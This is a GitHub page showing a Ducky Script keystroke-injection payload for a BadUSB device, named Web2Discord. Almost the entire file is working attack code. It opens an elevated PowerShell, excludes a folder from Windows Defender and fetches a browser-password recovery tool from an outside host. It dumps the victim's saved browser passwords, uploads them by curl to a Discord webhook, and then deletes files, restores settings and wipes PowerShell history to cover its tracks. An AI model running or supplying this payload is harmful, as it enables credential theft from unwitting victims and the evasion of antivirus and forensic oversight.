-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathWeb2Discord.txt
70 lines (70 loc) · 1.37 KB
/
Web2Discord.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
REM This is a modified script by DEFHerobrine that:
REM 1. Stops windows anti-virus 2. Installs file that finds stored passwords 3. Sends html to discord 4. Removes any traces
GUI D
DELAY 100
GUI r
DELAY 1000
STRING powershell -Noprofile "Start-Process powershell -verb runas"
ENTER
DELAY 2000
LEFT
DELAY 50
ENTER
DELAY 1500
STRING $webhook = 'YOUR DISCORD WEBHOOK'
ENTER
DELAY 500
STRING cd C:\ ; mkdir temp ; cd temp ; Add-MpPreference -ExclusionPath "C:\temp" ; Set-ExecutionPolicy unrestricted
ENTER
DELAY 500
STRING A
ENTER
STRING clear
ENTER
DELAY 1500
STRING Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/webpassview.zip -OutFile webpassview.zip ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/7z.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e webpassview.zip;
ENTER
DELAY 5000
STRING .\WebBrowserPassView.exe
ENTER
DELAY 1500
CTRL A
DELAY 500
CTRL S
DELAY 1500
CTRL L
DELAY 100
STRING C:\Temp
DELAY 75
ENTER
DELAY 100
GUI ALT N
STRING temp.html
ENTER
DELAY 500
ALT f
DELAY 500
DOWN
DOWN
ENTER
DELAY 3000
ENTER
ENTER
DELAY 1000
STRING curl.exe -F "[email protected]" $webhook
ENTER
DELAY 1000
STRING clear ; cd .. ; rm -r temp/
ENTER
DELAY 1000
STRING Remove-MpPreference -ExclusionPath "C:\temp" ; Set-ExecutionPolicy restricted
ENTER
DELAY 1500
STRING A
ENTER
DELAY 1000
STRING Remove-Item (Get-PSreadlineOption).HistorySavePath
ENTER
DELAY 500
STRING exit
ENTER